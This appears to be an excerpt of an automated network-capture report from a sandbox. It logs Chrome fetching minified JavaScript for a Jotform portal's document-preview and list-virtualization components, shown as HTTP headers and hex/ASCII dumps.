                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 69 3d 65 2e 73 63 72 6f 6c 6c 54 6f 70 3b 72 2e 73 65 74 53 74 61 74 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 2e 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3d 3d 3d 69 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 65 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 69 2c 6f 2d 6e 29 29 3b 72 65 74 75 72 6e 7b 69 73 53 63 72 6f 6c 6c 69 6e 67 3a 21 30 2c 73 63 72 6f 6c 6c 44 69 72 65 63 74 69 6f 6e 3a 74 2e 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3c 65 3f 22 66 6f 72 77 61 72 64 22 3a 22 62 61 63 6b 77 61 72 64 22 2c 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3a 65 2c 73 63 72 6f 6c 6c 55 70 64 61 74 65 57 61 73 52 65 71 75 65 73 74 65 64 3a 21 31 7d 7d 29 2c 72 2e 5f 72 65 73 65 74 49 73 53 63 72 6f 6c 6c 69 6e 67 44 65 62 6f 75 6e 63 65
                                                                                                                                                                                                                                            Data Ascii: i=e.scrollTop;r.setState((function(t){if(t.scrollOffset===i)return null;var e=Math.max(0,Math.min(i,o-n));return{isScrolling:!0,scrollDirection:t.scrollOffset<e?"forward":"backward",scrollOffset:e,scrollUpdateWasRequested:!1}}),r._resetIsScrollingDebounce
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 74 79 70 65 6f 66 20 72 26 26 6e 75 6c 6c 21 3d 74 68 69 73 2e 5f 6f 75 74 65 72 52 65 66 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 6f 75 74 65 72 52 65 66 3b 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 65 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6e 3f 6f 2e 73 63 72 6f 6c 6c 4c 65 66 74 3d 72 3a 6f 2e 73 63 72 6f 6c 6c 54 6f 70 3d 72 7d 74 68 69 73 2e 5f 63 61 6c 6c 50 72 6f 70 73 43 61 6c 6c 62 61 63 6b 73 28 29 7d 2c 72 2e 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 70 72 6f 70 73 2c 65 3d 74 2e 64 69 72 65 63 74 69 6f 6e 2c 72 3d 74 2e 6c 61 79 6f 75 74 2c 6e 3d 74 68 69 73 2e 73 74 61 74 65 2c 6f 3d 6e 2e 73 63 72 6f 6c 6c 4f 66 66 73 65 74 3b 69 66 28 6e 2e 73
                                                                                                                                                                                                                                            Data Ascii: typeof r&&null!=this._outerRef){var o=this._outerRef;"horizontal"===e||"horizontal"===n?o.scrollLeft=r:o.scrollTop=r}this._callPropsCallbacks()},r.componentDidUpdate=function(){var t=this.props,e=t.direction,r=t.layout,n=this.state,o=n.scrollOffset;if(n.s
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 7b 63 6c 61 73 73 4e 61 6d 65 3a 72 2c 6f 6e 53 63 72 6f 6c 6c 3a 78 2c 72 65 66 3a 74 68 69 73 2e 5f 6f 75 74 65 72 52 65 66 53 65 74 74 65 72 2c 73 74 79 6c 65 3a 28 30 2c 6e 2e 5a 29 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 72 65 6c 61 74 69 76 65 22 2c 68 65 69 67 68 74 3a 69 2c 77 69 64 74 68 3a 4d 2c 6f 76 65 72 66 6c 6f 77 3a 22 61 75 74 6f 22 2c 57 65 62 6b 69 74 4f 76 65 72 66 6c 6f 77 53 63 72 6f 6c 6c 69 6e 67 3a 22 74 6f 75 63 68 22 2c 77 69 6c 6c 43 68 61 6e 67 65 3a 22 74 72 61 6e 73 66 6f 72 6d 22 2c 64 69 72 65 63 74 69 6f 6e 3a 6f 7d 2c 49 29 7d 2c 28 30 2c 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 29 28 6c 7c 7c 75 7c 7c 22 64 69 76 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 52 2c 72 65 66 3a 61 2c 73 74 79 6c 65 3a 7b 68 65 69 67 68 74 3a 7a 3f
                                                                                                                                                                                                                                            Data Ascii: {className:r,onScroll:x,ref:this._outerRefSetter,style:(0,n.Z)({position:"relative",height:i,width:M,overflow:"auto",WebkitOverflowScrolling:"touch",willChange:"transform",direction:o},I)},(0,s.createElement)(l||u||"div",{children:R,ref:a,style:{height:z?
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 3e 69 29 7b 76 61 72 20 61 3d 30 3b 69 66 28 69 3e 3d 30 29 7b 76 61 72 20 6c 3d 6f 5b 69 5d 3b 61 3d 6c 2e 6f 66 66 73 65 74 2b 6c 2e 73 69 7a 65 7d 66 6f 72 28 76 61 72 20 73 3d 69 2b 31 3b 73 3c 3d 65 3b 73 2b 2b 29 7b 76 61 72 20 63 3d 6e 28 73 29 3b 6f 5b 73 5d 3d 7b 6f 66 66 73 65 74 3a 61 2c 73 69 7a 65 3a 63 7d 2c 61 2b 3d 63 7d 72 2e 6c 61 73 74 4d 65 61 73 75 72 65 64 49 6e 64 65 78 3d 65 7d 72 65 74 75 72 6e 20 6f 5b 65 5d 7d 2c 53 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 2c 6e 2c 6f 29 7b 66 6f 72 28 3b 6e 3c 3d 72 3b 29 7b 76 61 72 20 69 3d 6e 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 6e 29 2f 32 29 2c 61 3d 67 28 74 2c 69 2c 65 29 2e 6f 66 66 73 65 74 3b 69 66 28 61 3d 3d 3d 6f 29 72 65 74 75 72 6e 20 69 3b 61 3c 6f 3f 6e 3d 69 2b 31
                                                                                                                                                                                                                                            Data Ascii: >i){var a=0;if(i>=0){var l=o[i];a=l.offset+l.size}for(var s=i+1;s<=e;s++){var c=n(s);o[s]={offset:a,size:c},a+=c}r.lastMeasuredIndex=e}return o[e]},S=function(t,e,r,n,o){for(;n<=r;){var i=n+Math.floor((r-n)/2),a=g(t,i,e).offset;if(a===o)return i;a<o?n=i+1
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 6f 3d 74 2e 64 69 72 65 63 74 69 6f 6e 2c 69 3d 74 2e 68 65 69 67 68 74 2c 61 3d 74 2e 69 74 65 6d 43 6f 75 6e 74 2c 6c 3d 74 2e 6c 61 79 6f 75 74 2c 73 3d 74 2e 77 69 64 74 68 2c 63 3d 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6f 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6c 3f 73 3a 69 2c 75 3d 67 28 74 2c 65 2c 6e 29 2c 66 3d 72 2b 63 2c 64 3d 75 2e 6f 66 66 73 65 74 2b 75 2e 73 69 7a 65 2c 68 3d 65 3b 68 3c 61 2d 31 26 26 64 3c 66 3b 29 68 2b 2b 2c 64 2b 3d 67 28 74 2c 68 2c 6e 29 2e 73 69 7a 65 3b 72 65 74 75 72 6e 20 68 7d 2c 69 6e 69 74 49 6e 73 74 61 6e 63 65 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 7b 69 74 65 6d 4d 65 74 61 64 61 74 61 4d 61 70 3a 7b 7d 2c 65 73 74 69 6d 61
                                                                                                                                                                                                                                            Data Ascii: for(var o=t.direction,i=t.height,a=t.itemCount,l=t.layout,s=t.width,c="horizontal"===o||"horizontal"===l?s:i,u=g(t,e,n),f=r+c,d=u.offset+u.size,h=e;h<a-1&&d<f;)h++,d+=g(t,h,n).size;return h},initInstanceProps:function(t,e){var r={itemMetadataMap:{},estima
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC366INData Raw: 3d 74 2e 69 74 65 6d 43 6f 75 6e 74 2c 61 3d 74 2e 69 74 65 6d 53 69 7a 65 2c 6c 3d 74 2e 6c 61 79 6f 75 74 2c 73 3d 74 2e 77 69 64 74 68 2c 63 3d 65 2a 61 2c 75 3d 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6e 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 6c 3f 73 3a 6f 2c 66 3d 4d 61 74 68 2e 63 65 69 6c 28 28 75 2b 72 2d 63 29 2f 61 29 3b 72 65 74 75 72 6e 20 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 69 2d 31 2c 65 2b 66 2d 31 29 29 7d 2c 69 6e 69 74 49 6e 73 74 61 6e 63 65 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 7d 2c 73 68 6f 75 6c 64 52 65 73 65 74 53 74 79 6c 65 43 61 63 68 65 4f 6e 49 74 65 6d 53 69 7a 65 43 68 61 6e 67 65 3a 21 30 2c 76 61 6c 69 64 61 74 65 50 72 6f 70 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                                                                                                                                                            Data Ascii: =t.itemCount,a=t.itemSize,l=t.layout,s=t.width,c=e*a,u="horizontal"===n||"horizontal"===l?s:o,f=Math.ceil((u+r-c)/a);return Math.max(0,Math.min(i-1,e+f-1))},initInstanceProps:function(t){},shouldResetStyleCacheOnItemSizeChange:!0,validateProps:function(t)


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            100192.168.2.1749814104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC397OUTGET /s/portal/674ac14411e/static/js/DocumentPreview.af8c5c66.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 30019
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:26:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "47729a5b4d98f8419dce0e722efba3cb"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb65348100f7c-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC943INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 62 31 36 36 38 33 35 2d 35 65 65 33 2d 35 30 65 32 2d 39 33 33 32 2d 35 30 38 65 38 38
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab166835-5ee3-50e2-9332-508e88
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 62 6a 65 63 74 2e 61 73 73 69 67 6e 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 69 3d 31 3b 69 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 5b 69 5d 3b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 6e 29 28 7b 7d 29 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 74 29 26 26 28 65 5b 74 5d 3d 6e 5b 74 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 4e 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 63 6f 6e 73 74 20 49 3d 65 3d 3e 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 4e 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a
                                                                                                                                                                                                                                            Data Ascii: bject.assign.bind():function(e){for(var i=1;i<arguments.length;i++){var n=arguments[i];for(var t in n)({}).hasOwnProperty.call(n,t)&&(e[t]=n[t])}return e},N.apply(null,arguments)}const I=e=>r.createElement("svg",N({xmlns:"http://www.w3.org/2000/svg",fill:
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 4f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 32 36 30 3a 32 30 29 2c 53 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 38 30 3a 31 30 29 2c 7a 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2c 74 68 69 73 2e 69 6d 61 67 65 2e 63 75 72 72 65 6e 74 26 26 28 74 68 69 73 2e 68 61 6d 6d 65 72 3d 6d 28 29 28 74 68 69 73 2e 69 6d 61 67 65 2e 63 75 72 72 65 6e 74 29 2c 74 68 69 73 2e 68 61 6d 6d 65 72 2e 6f 6e 28 22 74 61 70 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 44 6f 75 62 6c 65 54 61 70 29 29 7d 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 28 29 7b 74 68 69 73 2e 68 61 6d 6d
                                                                                                                                                                                                                                            Data Ascii: O=window.innerHeight-(window.innerWidth>840?260:20),S=window.innerWidth-(window.innerWidth>840?80:10),z=window.innerWidth,this.image.current&&(this.hammer=m()(this.image.current),this.hammer.on("tap",this.handleDoubleTap))}componentWillUnmount(){this.hamm
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 65 74 20 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 31 30 30 2a 65 2f 69 29 2c 72 3d 21 31 3b 69 66 28 74 3e 4f 7c 7c 6f 3e 53 29 7b 72 3d 21 30 3b 63 6f 6e 73 74 20 69 3d 4f 2f 6e 2c 74 3d 53 2f 65 3b 73 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 31 30 30 2a 4d 61 74 68 2e 6d 69 6e 28 69 2c 74 29 29 7d 72 3f 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 70 65 72 63 65 6e 74 61 67 65 3a 73 7d 2c 28 28 29 3d 3e 74 68 69 73 2e 68 61 6e 64 6c 65 5a 6f 6f 6d 28 22 6f 75 74 22 2c 21 30 29 29 29 3a 74 68 69 73 2e 73 65 74 53 74 61 74 65 28 7b 70 65 72 63 65 6e 74 61 67 65 3a 73 2c 72 65 6e 64 65 72 3a 21 30 2c 69 6d 61 67 65 53 74 79 6c 65 3a 7b 6d 61 78 57 69 64 74 68 3a 22 6e 6f 6e 65 22 2c 6d 61 78 48 65 69 67 68 74 3a 22 6e 6f 6e 65 22 2c 77 69 64 74 68 3a 60 24 7b 65
                                                                                                                                                                                                                                            Data Ascii: et s=Math.floor(100*e/i),r=!1;if(t>O||o>S){r=!0;const i=O/n,t=S/e;s=Math.floor(100*Math.min(i,t))}r?this.setState({percentage:s},(()=>this.handleZoom("out",!0))):this.setState({percentage:s,render:!0,imageStyle:{maxWidth:"none",maxHeight:"none",width:`${e
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 72 48 65 69 67 68 74 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 32 36 30 3a 32 30 29 2c 41 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2d 28 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 38 34 30 3f 38 30 3a 31 30 29 3b 63 6c 61 73 73 20 24 20 65 78 74 65 6e 64 73 20 72 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 7b 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 28 29 7b 63 6f 6e 73 74 7b 66 69 6c 65 3a 65 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 69 3d 6e 65 77 20 6e 2e 67 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 3b 69 2e 6f 70 65 6e 28 22 47 45 54 22 2c 65 2e 70 72 65 76 69 65 77 55 72 6c 29 2c 69 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 3d 22 61 72 72 61 79 62 75 66 66 65 72 22 2c 69 2e 6f 6e 6c 6f 61 64
                                                                                                                                                                                                                                            Data Ascii: rHeight-(window.innerWidth>840?260:20),A=window.innerWidth-(window.innerWidth>840?80:10);class $ extends r.PureComponent{componentDidMount(){const{file:e}=this.props,i=new n.g.XMLHttpRequest;i.open("GET",e.previewUrl),i.responseType="arraybuffer",i.onload
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 6e 5b 74 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 5f 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 63 6f 6e 73 74 20 71 3d 65 3d 3e 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 5f 28 7b 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 7d 2c 65 29 2c 45 7c 7c 28 45 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 33 20 32 30 56 34 61 33 20 33 20 30 20 30 20 31 20 33 2d 33 68 37 2e 37 35 36 61 32 20 32 20 30 20 30 20 31 20 31 2e 34 32 35 2e 35 39 36 6c
                                                                                                                                                                                                                                            Data Ascii: n[t])}return e},_.apply(null,arguments)}const q=e=>r.createElement("svg",_({xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},e),E||(E=r.createElement("path",{fillRule:"evenodd",d:"M3 20V4a3 3 0 0 1 3-3h7.756a2 2 0 0 1 1.425.596l
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 49 6d 61 67 65 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 79 65 6c 6c 6f 77 2d 36 30 30 22 7d 2c 54 49 46 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 54 69 66 66 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 49 6d 61 67 65 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 79 65 6c 6c 6f 77 2d 36 30 30 22 7d 2c 4d 50 33 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 41 75 64 69 6f 22 2c 74 79 70 65 3a 22 61 75 64 69 6f 2f 6d 70 65 67 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 41 75 64 69 6f 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65
                                                                                                                                                                                                                                            Data Ascii: fileClass:"forFileUploadImage",wrapperClassName:"preview-yellow-600"},TIF:{component:"Tiff",fileClass:"forFileUploadImage",wrapperClassName:"preview-yellow-600"},MP3:{component:"Audio",type:"audio/mpeg",fileClass:"forFileUploadAudio",wrapperClassName:"pre
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 35 30 30 22 7d 2c 58 4c 53 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 55 6e 73 75 70 70 6f 72 74 65 64 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 44 6f 63 75 6d 65 6e 74 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 35 30 30 22 7d 2c 58 4c 53 58 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 55 6e 73 75 70 70 6f 72 74 65 64 22 2c 66 69 6c 65 43 6c 61 73 73 3a 22 66 6f 72 46 69 6c 65 55 70 6c 6f 61 64 44 6f 63 75 6d 65 6e 74 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 22 70 72 65 76 69 65 77 2d 62 6c 75 65 2d 35 30 30 22 7d 2c 43 53 56 3a 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 22 55 6e 73 75
                                                                                                                                                                                                                                            Data Ascii: pperClassName:"preview-blue-500"},XLS:{component:"Unsupported",fileClass:"forFileUploadDocument",wrapperClassName:"preview-blue-500"},XLSX:{component:"Unsupported",fileClass:"forFileUploadDocument",wrapperClassName:"preview-blue-500"},CSV:{component:"Unsu
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 7b 65 78 74 65 6e 73 69 6f 6e 3a 65 2c 69 73 50 72 65 76 69 65 77 3a 69 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 69 63 6f 6e 54 79 70 65 3a 6e 2c 66 69 6c 65 43 6c 61 73 73 3a 74 3d 22 22 2c 77 72 61 70 70 65 72 43 6c 61 73 73 4e 61 6d 65 3a 6f 7d 3d 47 5b 65 5d 7c 7c 47 2e 55 6e 73 75 70 70 6f 72 74 65 64 2c 72 3d 28 30 2c 73 2e 6a 73 78 29 28 57 2e 5a 2c 7b 7d 29 2c 6c 3d 28 30 2c 73 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 60 66 69 6c 65 50 72 65 76 69 65 77 48 6f 6c 64 65 72 20 24 7b 74 7d 20 24 7b 6f 7d 60 2c 63 68 69 6c 64 72 65 6e 3a 5b 6e 7c 7c 72 2c 65 26 26 21 6e 26 26 28 30 2c 73 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 69 6c 65 54 79 70 65 22 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 5d
                                                                                                                                                                                                                                            Data Ascii: {extension:e,isPreview:i})=>{const{iconType:n,fileClass:t="",wrapperClassName:o}=G[e]||G.Unsupported,r=(0,s.jsx)(W.Z,{}),l=(0,s.jsxs)("div",{className:`filePreviewHolder ${t} ${o}`,children:[n||r,e&&!n&&(0,s.jsx)("span",{className:"fileType",children:e})]
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 69 65 77 55 72 6c 3a 75 28 29 2e 73 74 72 69 6e 67 7d 29 2c 65 78 74 65 6e 73 69 6f 6e 3a 75 28 29 2e 73 74 72 69 6e 67 7d 2c 69 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 66 69 6c 65 3a 7b 7d 2c 65 78 74 65 6e 73 69 6f 6e 3a 22 22 7d 3b 76 61 72 20 6e 65 3d 69 65 2c 74 65 3d 6e 28 22 32 30 33 36 36 22 29 2c 6f 65 3d 6e 28 22 34 33 33 38 32 22 29 2c 73 65 3d 6e 28 22 31 31 35 37 37 22 29 2c 72 65 3d 6e 28 22 34 35 30 33 34 22 29 2c 6c 65 3d 6e 2e 6e 28 72 65 29 3b 63 6f 6e 73 74 20 61 65 3d 28 65 2c 69 3d 22 32 2e 31 34 2e 33 30 35 22 29 3d 3e 7b 76 61 72 20 6e 2c 74 3b 6c 65 74 20 6f 3d 22 22 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 21 21 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 77 69 6e 64 6f 77 2e 5f 5f 6a 66 72 6f 75 74 65 72 29 7c 7c 76 6f 69 64
                                                                                                                                                                                                                                            Data Ascii: iewUrl:u().string}),extension:u().string},ie.defaultProps={file:{},extension:""};var ne=ie,te=n("20366"),oe=n("43382"),se=n("11577"),re=n("45034"),le=n.n(re);const ae=(e,i="2.14.305")=>{var n,t;let o="";switch(!0){case!!(null===(n=window.__jfrouter)||void


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            101192.168.2.1749815104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC386OUTGET /s/portal/674ac14411e/static/js/5241.1f05701c.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:22 UTC427INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:22 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 624979
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:26:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "7bf05f15e88ca1a7a9d1060e2feed54f"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6567e37433a-EWR
